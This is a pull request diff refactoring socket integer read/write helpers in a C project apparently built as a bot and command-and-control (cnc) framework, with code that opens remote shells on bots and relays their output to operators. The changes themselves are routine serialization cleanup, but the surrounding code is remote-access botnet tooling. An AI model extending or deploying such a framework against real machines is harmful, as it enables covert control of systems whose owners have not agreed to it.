### PR TITLE
Minor refactoring

### DIFF
--- a/bot/lin/linshell.c
+++ b/bot/lin/linshell.c
@@ -73,7 +73,7 @@ bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *_shell)
     if (rd > 0) {
         /* we read some input! send to cnc */
         laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
-        laikaS_writeInt(sock, &shell->_shell.id, sizeof(uint32_t));
+        laikaS_writeu32(sock, shell->_shell.id);
         laikaS_write(sock, readBuf, rd);
         laikaS_endVarPacket(peer);
     } else if (rd == -1) {

--- a/bot/src/bot.c
+++ b/bot/src/bot.c
@@ -12,7 +12,7 @@ void laikaB_handleHandshakeResponse(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, 
     uint8_t endianness = laikaS_readByte(&peer->sock);
     laikaS_read(&peer->sock, saltBuf, LAIKA_HANDSHAKE_SALT_LEN);
 
-    peer->sock.flipEndian = endianness != laikaS_isBigEndian();
+    peer->sock.flipEndian = endianness != laikaM_isBigEndian();
 
     /* set peer salt */
     laikaS_setSalt(peer, saltBuf);

--- a/bot/src/shell.c
+++ b/bot/src/shell.c
@@ -28,7 +28,7 @@ void laikaB_freeShell(struct sLaika_bot *bot, struct sLaika_shell *shell)
 
     /* tell cnc shell is closed */
     laikaS_startOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
-    laikaS_writeInt(&bot->peer->sock, &id, sizeof(uint32_t));
+    laikaS_writeu32(&bot->peer->sock, id);
     laikaS_endOutPacket(bot->peer);
 
     laikaB_freeRAWShell(bot, shell);
@@ -51,9 +51,9 @@ void laikaB_handleShellOpen(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     uint32_t id;
     uint16_t cols, rows;
 
-    laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
-    laikaS_readInt(&peer->sock, &cols, sizeof(uint16_t));
-    laikaS_readInt(&peer->sock, &rows, sizeof(uint16_t));
+    id = laikaS_readu32(&peer->sock);
+    cols = laikaS_readu16(&peer->sock);
+    rows = laikaS_readu16(&peer->sock);
 
     /* check if shell is already open */
     if (id > LAIKA_MAX_SHELLS || (shell = bot->shells[id]))
@@ -62,7 +62,7 @@ void laikaB_handleShellOpen(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     /* open shell & if we failed, tell cnc */
     if ((shell = laikaB_newShell(bot, cols, rows, id)) == NULL) {
         laikaS_startOutPacket(bot->peer, LAIKAPKT_SHELL_CLOSE);
-        laikaS_writeInt(&bot->peer->sock, &id, sizeof(uint32_t));
+        laikaS_writeu32(&bot->peer->sock, id);
         laikaS_endOutPacket(bot->peer);
     }
 }
@@ -73,7 +73,7 @@ void laikaB_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
     struct sLaika_shell *shell;
     uint32_t id;
 
-    laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&peer->sock);
 
     /* check if shell is not running */
     if (id > LAIKA_MAX_SHELLS || !(shell = bot->shells[id]))
@@ -91,7 +91,7 @@ void laikaB_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     uint32_t id;
 
     /* read data buf */
-    laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&peer->sock);
     laikaS_read(&peer->sock, buf, sz - sizeof(uint32_t));
 
     /* sanity check shell */

--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@@ -184,7 +184,7 @@ bool laikaB_readShell(struct sLaika_bot *bot, struct sLaika_shell *_shell)
     if (readSucc) {
         /* we read some input! send to cnc */
         laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
-        laikaS_writeInt(sock, &shell->_shell.id, sizeof(uint32_t));
+        laikaS_writeu32(sock, shell->_shell.id);
         laikaS_write(sock, readBuf, rd);
         laikaS_endVarPacket(peer);
     } else {

--- a/cnc/src/cnc.c
+++ b/cnc/src/cnc.c
@@ -83,7 +83,7 @@ void laikaC_handleHandshakeRequest(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, v
 
     /* queue response */
     laikaS_startOutPacket(peer, LAIKAPKT_HANDSHAKE_RES);
-    laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
+    laikaS_writeByte(&peer->sock, laikaM_isBigEndian());
     laikaS_write(&peer->sock, peer->salt, LAIKA_HANDSHAKE_SALT_LEN);
     laikaS_endOutPacket(peer);
 

--- a/cnc/src/cpanel.c
+++ b/cnc/src/cpanel.c
@@ -65,8 +65,8 @@ void laikaC_handleAuthenticatedShellOpen(struct sLaika_peer *authPeer, LAIKAPKT_
         LAIKA_ERROR("laikaC_handleAuthenticatedShellOpen: Requested peer isn't a bot!\n");
 
     /* read term size */
-    laikaS_readInt(&authPeer->sock, &cols, sizeof(uint16_t));
-    laikaS_readInt(&authPeer->sock, &rows, sizeof(uint16_t));
+    cols = laikaS_readu16(&authPeer->sock);
+    rows = laikaS_readu16(&authPeer->sock);
 
     /* open shell */
     laikaC_openShell(peer, authPeer, cols, rows);
@@ -80,7 +80,7 @@ void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT
     struct sLaika_shellInfo *shell;
     uint32_t id;
 
-    laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&authPeer->sock);
 
     /* ignore malformed packet */
     if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
@@ -102,7 +102,7 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
     if (sz - sizeof(uint32_t) > LAIKA_SHELL_DATA_MAX_LENGTH)
         LAIKA_ERROR("laikaC_handleAuthenticatedShellData: Wrong data size!\n");
 
-    laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&authPeer->sock);
     sz -= sizeof(uint32_t);
 
     /* ignore malformed packet */
@@ -116,7 +116,7 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
 
     /* forward to peer */
     laikaS_startVarPacket(peer, LAIKAPKT_SHELL_DATA);
-    laikaS_writeInt(&peer->sock, &shell->botShellID, sizeof(uint32_t));
+    laikaS_writeu32(&peer->sock, shell->botShellID);
     laikaS_write(&peer->sock, data, sz);
     laikaS_endVarPacket(peer);
 }

--- a/cnc/src/cpeer.c
+++ b/cnc/src/cpeer.c
@@ -88,15 +88,15 @@ struct sLaika_shellInfo *laikaC_openShell(struct sLaika_peer *bot, struct sLaika
 
     /* send SHELL_OPEN packets */
     laikaS_startOutPacket(bot, LAIKAPKT_SHELL_OPEN);
-    laikaS_writeInt(&bot->sock, &shell->botShellID, sizeof(uint32_t));
-    laikaS_writeInt(&bot->sock, &cols, sizeof(uint16_t));
-    laikaS_writeInt(&bot->sock, &rows, sizeof(uint16_t));
+    laikaS_writeu32(&bot->sock, shell->botShellID);
+    laikaS_writeu16(&bot->sock, cols);
+    laikaS_writeu16(&bot->sock, rows);
     laikaS_endOutPacket(bot);
 
     laikaS_startOutPacket(auth, LAIKAPKT_SHELL_OPEN);
-    laikaS_writeInt(&auth->sock, &shell->authShellID, sizeof(uint32_t));
-    laikaS_writeInt(&auth->sock, &cols, sizeof(uint16_t));
-    laikaS_writeInt(&auth->sock, &rows, sizeof(uint16_t));
+    laikaS_writeu32(&auth->sock, shell->authShellID);
+    laikaS_writeu16(&auth->sock, cols);
+    laikaS_writeu16(&auth->sock, rows);
     laikaS_endOutPacket(auth);
 
     return shell;
@@ -106,11 +106,11 @@ void laikaC_closeShell(struct sLaika_shellInfo *shell)
 {
     /* send SHELL_CLOSE packets */
     laikaS_startOutPacket(shell->bot, LAIKAPKT_SHELL_CLOSE);
-    laikaS_writeInt(&shell->bot->sock, &shell->botShellID, sizeof(uint32_t));
+    laikaS_writeu32(&shell->bot->sock, shell->botShellID);
     laikaS_endOutPacket(shell->bot);
 
     laikaS_startOutPacket(shell->auth, LAIKAPKT_SHELL_CLOSE);
-    laikaS_writeInt(&shell->auth->sock, &shell->authShellID, sizeof(uint32_t));
+    laikaS_writeu32(&shell->auth->sock, shell->authShellID);
     laikaS_endOutPacket(shell->auth);
 
     /* unlink */
@@ -175,7 +175,7 @@ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
     struct sLaika_shellInfo *shell;
     uint32_t id;
 
-    laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&peer->sock);
 
     /* ignore packet if shell isn't open */
     if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
@@ -196,7 +196,7 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     if (sz > LAIKA_SHELL_DATA_MAX_LENGTH + sizeof(uint32_t))
         return;
 
-    laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
+    id = laikaS_readu32(&peer->sock);
 
     /* ignore packet if shell isn't open */
     if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
@@ -206,7 +206,7 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
 
     /* forward SHELL_DATA packet to auth */
     laikaS_startVarPacket(shell->auth, LAIKAPKT_SHELL_DATA);
-    laikaS_writeInt(&shell->auth->sock, &shell->authShellID, sizeof(uint32_t));
+    laikaS_writeu32(&shell->auth->sock, shell->authShellID);
     laikaS_write(&shell->auth->sock, buf, sz - sizeof(uint32_t));
     laikaS_endVarPacket(shell->auth);
 }

--- a/lib/include/core/lmem.h
+++ b/lib/include/core/lmem.h
@@ -57,29 +57,7 @@
     } while (0);
 
 void *laikaM_realloc(void *buf, size_t sz);
-
-inline bool laikaM_isBigEndian(void)
-{
-    union
-    {
-        uint32_t i;
-        uint8_t c[4];
-    } _indxint = {0xDEADB33F};
-
-    return _indxint.c[0] == 0xDE;
-}
-
-inline void laikaM_reverse(uint8_t *buf, size_t sz)
-{
-    int k;
-
-    /* swap bytes, reversing the buffer */
-    for (k = 0; k < (sz / 2); k++) {
-        uint8_t tmp = buf[k];
-        buf[k] = buf[sz - k - 1];
-        buf[sz - k - 1] = tmp;
-    }
-}
-
+bool laikaM_isBigEndian(void);
+void laikaM_reverse(uint8_t *buf, size_t sz);
 
 #endif

--- a/lib/include/core/lmem.h
+++ b/lib/include/core/lmem.h
@@ -58,4 +58,28 @@
 
 void *laikaM_realloc(void *buf, size_t sz);
 
+inline bool laikaM_isBigEndian(void)
+{
+    union
+    {
+        uint32_t i;
+        uint8_t c[4];
+    } _indxint = {0xDEADB33F};
+
+    return _indxint.c[0] == 0xDE;
+}
+
+inline void laikaM_reverse(uint8_t *buf, size_t sz)
+{
+    int k;
+
+    /* swap bytes, reversing the buffer */
+    for (k = 0; k < (sz / 2); k++) {
+        uint8_t tmp = buf[k];
+        buf[k] = buf[sz - k - 1];
+        buf[sz - k - 1] = tmp;
+    }
+}
+
+
 #endif

--- a/lib/include/net/lsocket.h
+++ b/lib/include/net/lsocket.h
@@ -88,8 +88,6 @@ struct sLaika_socket
 
 #define laikaS_isAlive(arg) (arg->sock != INVALID_SOCKET)
 
-bool laikaS_isBigEndian(void);
-
 void laikaS_init(void);
 void laikaS_cleanUp(void);
 
@@ -114,10 +112,10 @@ void laikaS_readKeyDecrypt(struct sLaika_socket *sock, void *buf, size_t sz, uin
                            uint8_t *priv); /* decrypts & reads to buf using pub & priv key*/
 void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
 uint8_t laikaS_readByte(struct sLaika_socket *sock);
-void laikaS_readInt(struct sLaika_socket *sock, void *buf,
-                    size_t sz); /* reads INT, respecting endianness */
-void laikaS_writeInt(struct sLaika_socket *sock, void *buf,
-                     size_t sz); /* writes INT, respecting endianness */
+void laikaS_writeu16(struct sLaika_socket *sock, uint16_t i); /* writes UINT16, respecting endianness */
+uint16_t laikaS_readu16(struct sLaika_socket *sock); /* reads UINT16, respecting endianness */
+void laikaS_writeu32(struct sLaika_socket *sock, uint32_t i); /* writes UINT32, respecting endianness */
+uint32_t laikaS_readu32(struct sLaika_socket *sock); /* reads UINT32, respecting endianness */
 
 RAWSOCKCODE laikaS_rawRecv(struct sLaika_socket *sock, size_t sz, int *processed);
 RAWSOCKCODE laikaS_rawSend(struct sLaika_socket *sock, size_t sz, int *processed);

--- a/lib/src/core/lmem.c
+++ b/lib/src/core/lmem.c
@@ -18,3 +18,26 @@ void *laikaM_realloc(void *buf, size_t sz)
 
     return newBuf;
 }
+
+bool laikaM_isBigEndian(void)
+{
+    union
+    {
+        uint32_t i;
+        uint8_t c[4];
+    } _indxint = {0xDEADB33F};
+
+    return _indxint.c[0] == 0xDE;
+}
+
+void laikaM_reverse(uint8_t *buf, size_t sz)
+{
+    int k;
+
+    /* swap bytes, reversing the buffer */
+    for (k = 0; k < (sz / 2); k++) {
+        uint8_t tmp = buf[k];
+        buf[k] = buf[sz - k - 1];
+        buf[sz - k - 1] = tmp;
+    }
+}

--- a/lib/src/net/lpeer.c
+++ b/lib/src/net/lpeer.c
@@ -232,7 +232,7 @@ bool laikaS_handlePeerIn(struct sLaika_socket *sock)
             LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT\n");
 
         /* read packet size */
-        laikaS_readInt(&peer->sock, (void *)&peer->pktSize, sizeof(LAIKAPKT_SIZE));
+        peer->pktSize = laikaS_readu16(&peer->sock);
 
         if (peer->pktSize > LAIKA_MAX_PKTSIZE)
             LAIKA_ERROR("variable packet too large!\n");

--- a/lib/src/net/lsocket.c
+++ b/lib/src/net/lsocket.c
@@ -8,17 +8,6 @@
 
 static int _LNSetup = 0;
 
-bool laikaS_isBigEndian(void)
-{
-    union
-    {
-        uint32_t i;
-        uint8_t c[4];
-    } _indxint = {0xDEADB33F};
-
-    return _indxint.c[0] == 0xDE;
-}
-
 void laikaS_init(void)
 {
     if (_LNSetup++ > 0)
@@ -258,41 +247,46 @@ uint8_t laikaS_readByte(struct sLaika_socket *sock)
     return tmp;
 }
 
-void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz)
+void laikaS_writeu16(struct sLaika_socket *sock, uint16_t i)
 {
-    if (sock->flipEndian) {
-        VLA(uint8_t, tmp, sz); /* allocate tmp buffer to hold data while we switch endianness */
-        int k;
+    uint16_t tmp = i; /* copy int to buffer (which we can reverse if need-be) */
 
-        laikaS_read(sock, (void *)tmp, sz);
+    if (sock->flipEndian)
+        laikaM_reverse((uint8_t *)&tmp, sizeof(tmp));
 
-        /* copy tmp buffer to user buffer, flipping endianness */
-        for (k = 0; k < sz; k++)
-            *((uint8_t *)buf + k) = tmp[sz - k - 1];
-
-        ENDVLA(tmp);
-    } else {
-        /* just a wrapper for laikaS_read */
-        laikaS_read(sock, buf, sz);
-    }
+    laikaS_write(sock, (void *)&tmp, sizeof(tmp));
 }
 
-void laikaS_writeInt(struct sLaika_socket *sock, void *buf, size_t sz)
+uint16_t laikaS_readu16(struct sLaika_socket *sock)
 {
-    if (sock->flipEndian) {
-        VLA(uint8_t, tmp, sz); /* allocate tmp buffer to hold data while we switch endianness */
-        int k;
+    uint16_t tmp;
+    laikaS_read(sock, (void *)&tmp, sizeof(tmp));
 
-        /* copy user buffer to tmp buffer, flipping endianness */
-        for (k = 0; k < sz; k++)
-            tmp[k] = *((uint8_t *)buf + (sz - k - 1));
+    if (sock->flipEndian)
+        laikaM_reverse((uint8_t *)&tmp, sizeof(tmp));
 
-        laikaS_write(sock, (void *)tmp, sz);
-        ENDVLA(tmp);
-    } else {
-        /* just a wrapper for laikaS_write */
-        laikaS_write(sock, buf, sz);
-    }
+    return tmp;
+}
+
+void laikaS_writeu32(struct sLaika_socket *sock, uint32_t i)
+{
+    uint32_t tmp = i; /* copy int to buffer (which we can reverse if need-be) */
+
+    if (sock->flipEndian)
+        laikaM_reverse((uint8_t *)&tmp, sizeof(tmp));
+
+    laikaS_write(sock, (void *)&tmp, sizeof(tmp));
+}
+
+uint32_t laikaS_readu32(struct sLaika_socket *sock)
+{
+    uint32_t tmp;
+    laikaS_read(sock, (void *)&tmp, sizeof(tmp));
+
+    if (sock->flipEndian)
+        laikaM_reverse((uint8_t *)&tmp, sizeof(tmp));
+
+    return tmp;
 }
 
 RAWSOCKCODE laikaS_rawRecv(struct sLaika_socket *sock, size_t sz, int *processed)


### PR DESCRIPTION
lsocket.[ch]: refactored writeInt && readInt
- switched to laikaS_readu* && laikaS_writeu*
- this gets rid of the ugly malloc() for platforms that don't support VLAs

lmem.[ch]: removed inlined functions
- fixes some builds